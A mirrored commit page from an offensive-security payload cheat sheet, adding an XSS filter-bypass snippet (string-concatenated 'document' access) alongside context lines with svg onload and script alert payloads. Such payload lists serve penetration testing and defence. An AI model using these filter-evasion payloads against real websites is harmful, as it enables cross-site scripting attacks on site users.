mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-02-21 22:23:45 +00:00
Merge pull request #491 from Ooggle/patch-1
Add XSS document blacklist bypass
This commit is contained in:
commit
629f6d6cef
@ -725,6 +725,7 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
|
|||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
|
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
|
||||||
|
window["doc"+"ument"]
|
||||||
```
|
```
|
||||||
|
|
||||||
### Bypass using javascript inside a string
|
### Bypass using javascript inside a string
|
||||||
|
Loading…
Reference in New Issue
Block a user